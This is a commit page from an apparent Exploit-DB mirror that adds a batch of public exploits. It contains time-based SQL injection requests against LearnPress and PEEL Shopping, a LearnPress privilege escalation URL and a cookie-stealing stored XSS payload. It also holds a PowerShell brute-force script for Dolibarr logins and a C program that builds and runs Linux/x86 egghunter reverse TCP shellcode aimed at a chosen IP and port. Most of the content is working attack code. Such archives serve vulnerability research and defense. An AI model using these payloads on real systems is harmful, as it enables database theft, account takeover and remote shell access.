bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-07-20

Browse source 
6 changes to exploits/shellcodes

WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)
Dolibarr ERP/CRM 10.0.6 - Login Brute Force
PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection

Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
This commit is contained in:
Offensive Security 2021-07-20 05:01:52 +00:00
parent 29558b9c84
commit c385c8068c
8 changed files with 448 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

32
exploits/php/webapps/50137.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.8
# References link: https://wpscan.com/vulnerability/10208
# CVE: CVE-2020-6010
POC:
1. Go to url http://<host>/wp-admin
2. Login with a cred
3. Execute the payload
POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145
type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -
# Modify current_items[] as you want

18
exploits/php/webapps/50138.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511
POC:
1. Find out your user id
2. Login with your cred
3. Execute the payload
http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>
# Done!

17
exploits/php/webapps/50139.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)
# Date: 18/07/2021
# Exploit Author: Vikas Srivastava
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/mimetic-books/
# Version: 0.2.13
# Category: Web Application
# Tested on Mac
How to Reproduce this Vulnerability:
1. Install WordPress 5.7.2
2. Install and activate Mimetic Books
3. Navigate to Settings >> Mimetic Books API and enter the XSS payload into the Default Publisher ID input field.
4. Click Save Changes.
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
6. Payload Used: "><script>alert(document.cookie)</script>

68
exploits/php/webapps/50140.ps1 Normal file
View file

@ -0,0 +1,68 @@
# Exploit Title: Dolibarr ERP/CRM 10.0.6 - Login Brute Force
# Date:2020-01-18
# Exploit Author: Creamy Chicken Soup
# Vendor Homepage: https://www.dolibarr.org
# Software Link: https://sourceforge.net/projects/dolibarr/
# Version: 10.0.6
# Tested on: Windows 10 - 64bit
# CVE: CVE-2020-7995
function brute($url,$username,$passwd){
try{
$WebResponse = Invoke-WebRequest $url
$a=$WebResponse.Forms.fields
$fields=@{"token"=$a.token ;"loginfunction"=$a.loginfunction;"username"=$username;"password"=$passwd}
$WebResponse1 = Invoke-WebRequest -Uri $url -Method Post -Body $fields
if($WebResponse1.Forms.Id -ne "login"){
Write-Host "username password is match"
Write-Warning "user: $username ,passwoed: $passwd"
return $true
}
}catch{
Write-Warning "Something Wrong!"
}
}
function fileinput($filepath,$url){
try{
Write-Host "Target: $url"
$fp=Get-Content -Path $filepath
foreach($line in $fp){
$s=$line -split ':'
$username=$s[0]
$passwd=$s[1]
Write-Host "[+] Check $username : $passwd"
$bf=brute $url $username $passwd
if($bf -eq $True){
break
}
}
}catch{
Write-Warning "File is error"
}
}
$textart=@'
____ ____ _____ ____ _ ___ _ ____ _ _ ____ _ __ _____ _ ____ ____ _ ____
/ _\/ __\/ __// _ \/ \__/|\ \/// _\/ \ /|/ \/ _\/ |/ // __// \ /|/ ___\/ _ \/ \ /\/ __\
| / | \/|| \ | / \|| |\/|| \ / | / | |_||| || / | / | \ | |\ ||| \| / \|| | ||| \/|
| \__| /| /_ | |-||| | || / / | \__| | ||| || \_ | \ | /_ | | \||\___ || \_/|| \_/|| __/
\____/\_/\_\\____\\_/ \|\_/ \|/_/ \____/\_/ \|\_/\____/\_|\_\\____\\_/ \|\____/\____/\____/\_/
'@
Write-Host $textart
Write-Host @'
Exploit Title: DOLIBARR ERP/CRM - Brute Force Vulnerability
Date: 2020-01-18
Exploit Author: CreamyChickenSoup
Vendor Homepage: https://www.dolibarr.org
Version: 10.0.6
CVE: CVE-2020-7995
Vulnerable Page : http://localhost/htdocs/index.php?mainmenu=home
Twitter: @creamychickens1
cve submited:Tufan Gungor
'@
$url=Read-Host "Enter Url:"
$filepath=Read-Host "Enter FilePAth: (File content like : user:pass)"
fileinput $filepath $url

93
exploits/php/webapps/50142.txt Normal file
View file

@ -0,0 +1,93 @@
# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection
# Date: 2021-07-10
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.peel.fr
# Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download
# Version: prior to 9.4.0
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/advisto/peel-shopping/issues/3
################
# Description #
################
# PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.
#####################
# PoC of detection #
#####################
1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".
PoC #1) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
Request: The response duration = 418 bytes | 7,719 millis
========
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
---
2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.
PoC #2) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
Request: The response duration = 418 bytes | 5,112 millis
========
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
---
3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.
PoC #3) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
Request: The response duration = 418 bytes | 10,140 millis
========
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
---
# For more explaination, you can refer to the github issue on peel-shopping via https://github.com/advisto/peel-shopping/issues/3.
# The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1
# The vendor has released the latest patched version on 9.4.0.1 that is available for download from sourceforge.net[https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]

5
files_exploits.csv
View file

@ -44270,3 +44270,8 @@ id,file,description,date,author,type,platform,port
50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",2021-07-15,"Simone Cristofaro",webapps,php, 50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",2021-07-15,"Simone Cristofaro",webapps,php,
50131,exploits/java/webapps/50131.py,"ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)",2021-07-16,Photubias,webapps,java, 50131,exploits/java/webapps/50131.py,"ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)",2021-07-16,Photubias,webapps,java,
50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",2021-07-16,"Metin Yunus Kandemir",webapps,hardware, 50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",2021-07-16,"Metin Yunus Kandemir",webapps,hardware,
50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",2021-07-19,nhattruong,webapps,php,
50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",2021-07-19,nhattruong,webapps,php,
50139,exploits/php/webapps/50139.txt,"WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)",2021-07-19,"Vikas Srivastava",webapps,php,
50140,exploits/php/webapps/50140.ps1,"Dolibarr ERP/CRM 10.0.6 - Login Brute Force",2021-07-19,"Creamy Chicken Soup",webapps,php,
50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",2021-07-19,faisalfs10x,webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1040,3 +1040,4 @@ id,file,description,date,author,type,platform
49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",2021-06-10,d7x,shellcode,linux_x86 49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",2021-06-10,d7x,shellcode,linux_x86
50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",2021-07-13,d7x,shellcode,linux_x86 50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",2021-07-13,d7x,shellcode,linux_x86
50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",2021-07-13,d7x,shellcode,linux_x86 50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",2021-07-13,d7x,shellcode,linux_x86
50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",2021-07-19,d7x,shellcode,linux_x86

1 id file description date author type platform
1040 49976 shellcodes/linux_x86/49976.c Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) 2021-06-10 d7x shellcode linux_x86
1041 50124 shellcodes/linux_x86/50124.c Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) 2021-07-13 d7x shellcode linux_x86
1042 50125 shellcodes/linux_x86/50125.c Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) 2021-07-13 d7x shellcode linux_x86
1043 50141 shellcodes/linux_x86/50141.c Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode 2021-07-19 d7x shellcode linux_x86

214
shellcodes/linux_x86/50141.c Normal file
View file

@ -0,0 +1,214 @@
# Exploit Title: Linux/x86 - Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
# Date: 18/07/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86
/***
Linux/x86 - Egghunter Reverse TCP Shell Shellcode Generator with dynamic IP and port Shellcode
Author: d7x
https://d7x.promiselabs.net/
https://www.promiselabs.net/
***/
/*
Egghunter payloads from skape modified to work on a modern up to date architecture
For detailed information on the egghunter payloads and egghunter research refer to the original whitepaper by skape:
Safely Searching Process Virtual Address Space http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
Example usage of egghunters https://www.fuzzysecurity.com/tutorials/expDev/4.html
*/
/* Usage: $ gcc -fno-stack-protector -z execstack -o egghunter egghunter_shellcode.c
$ ./egghunter 2 3d7xC0D3 192.168.1.137 6666 # This will output AND execute the egghunter! (if you get a seg fault/core dumped error either your shellcode output contains null bytes or you have no idea what you are doing)
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
void PrintShellcode(unsigned char* s);
void change_shellcode_bytes(unsigned char shellcode[], int offset, int n, unsigned char new[]);
unsigned char* ConvertStrToHex(unsigned char* s);
unsigned char egghunter[][200] = { \
{"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"}, // access method - 39 bytes
{"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"}, //access revisited (fixed) - 37 bytes
{"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"} //sigaction method (fixed) - 32 bytes
};
/* unsigned char egghunter[] = \
"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (fixed) - 32 bytes
//"\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (original version by skape - 30 bytes)
//"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (fixed) - 37 bytes
//"\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (original version by skape) - 35 bytes
//"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"; // access method - 39 bytes
*/
/* Reverse TCP Shell:
egg \x90\x50\x90\x50\x90\x50\x90\x50
127.1.1.1 4444 */
unsigned char shellcode[] = \
"\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"; //IP address at eggsize + 26th byte; Port at eggsize + 32nd byte
int eggsize = 4; //default
main(int argc, char *argv[])
{
if (argc < 2)
{
printf("Usage: %s <egghunter> [egg] [IP] [Port]", argv[0]);
printf("\nExample: %s 0 0x9050 127.1.1 4444\n"
"%s 1 AABB 127.1.1.1 4444\n"
"%s 2 AABBCCDD 127.1.1.1 4444\n"
"%s 2 3d7xC0D3 127.1.1.1 4444\n", argv[0], argv[0], argv[0], argv[0]);
printf("\n\nDefault egg: \\x90\\x50\\x90\\x50 (push eax, nop, push eax, nop)"
"\nDefault shellcode IP and port 127.1.1.1:4444");
printf("\n\nAvailable egghunters:"
"\n0 - access method (39 bytes), requires executable egg"
"\n1 - access revisited (37 bytes)"
"\n2 - sigaction (32 bytes)\n"
);
return 0;
}
int eh = atoi((char *)argv[1]);
if (eh < 0 || eh > 2)
{
printf("Invalid Egghunter: %d!\n", eh);
return 0;
}
if (argc > 2)
{
if (argv[2][0] == '0' && argv[2][1] == 'x') argv[2] += 2;
if (strlen(argv[2]) != 4 && strlen(argv[2]) != 8)
{
printf("Egg has to be at least 4 or exactly 8 bytes!"
"\nExample eggs: 9050, 9060, C0D3,"
"\n d7xC0D3D, 3d7xC0D3, 3d7xC0D3, 7d7xC0D3"
"\n"
);
return 0;
}
int i;
for (i = 0; i < strlen(argv[2]); i+=2)
if (argv[2][i] == '0' && argv[2][i+1] == '0')
{
printf("No null bytes!\n");
return 0;
}
}
/* change egg if provided */
int eh_offset = 1; // default offset for access method (39 bytes)
if (eh == 1) eh_offset = 23; // offset for access revisited (37 bytes)
else if (eh ==2) eh_offset = 18; // offset for sigaction (32 bytes)
if (argc > 2) {
unsigned char* new_egg = argv[2], *s, *tmp;
printf("Changing egg to %s...\n", new_egg);
s = ConvertStrToHex(argv[2]);
tmp = s;
//fill buffer - 4 bytes of [egg], then concatenate additional 4 bytes of [egg] (8 bytes)
strcat(tmp, s);
if (strlen(argv[2]) == 4)
strcat(tmp, tmp);
//PrintShellcode(s);
change_shellcode_bytes(egghunter[eh], eh_offset, eh_offset+3, s);
change_shellcode_bytes(shellcode, 0, 7, tmp);
}
printf("Egghunter %d, size %d\n", eh, strlen(egghunter[eh] ) );
printf("Egghunter shellcode: \n");
PrintShellcode(egghunter[eh]);
printf("\nReverse TCP Shellcode (%d bytes): \n", strlen(shellcode));
// change shellcode IP address
unsigned char *s2 = shellcode;
if (argc > 3)
{
printf("%s\n", argv[3]);
// convert IP address to binary representation and store in ipaddr.sin_addr.s_addr
struct sockaddr_in ipaddr;
inet_aton(argv[3], &ipaddr.sin_addr.s_addr);
int i = eggsize*2+26, a;
int e = i+3;
for (i, a = 0; i <= e; i++, a+=8)
{
s2[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ;
printf("Byte %d: %.02x\n", i, s2[i]);
}
}
// change shellcode Port
int port = 4444; //0x115c - default
if (argc > 4)
{
port = atoi(argv[4]);
unsigned int p1 = (port >> 8) & 0xff;
unsigned int p2 = port & 0xff;
s2[eggsize*2+32] = (unsigned char){p1};
s2[eggsize*2+33] = (unsigned char){p2};
}
printf("Port %d\n", port);
PrintShellcode(s2);
printf("\n");
int (*ret)() = (int(*)())egghunter[eh];
ret();
}
void change_shellcode_bytes(unsigned char* shellcode_n, int offset, int n, unsigned char* new)
{
int i, a;
for (i = offset, a = 0; i <= n; i++, a++)
shellcode_n[i] = (unsigned char) {new[a]};
// printf("Byte %d: %.02x\n", i, shellcode_n[i]);
}
void PrintShellcode(unsigned char* s)
{
printf("\"");
while (*s)
printf("\\x%.02x", (unsigned int) *s++);
printf("\"\n");
}
unsigned char* ConvertStrToHex(unsigned char* s)
{
if (s[0] == '0' && s[1] == 'x') s += 2;
unsigned char buf[strlen(s)/2];
buf[strlen(s)/2] = '\0';
int len = sizeof(buf);
size_t count;
for (count = 0; count < len; count++) {
sscanf(s, "%2hhx", &buf[count]);
s += 2;
}
return buf;
}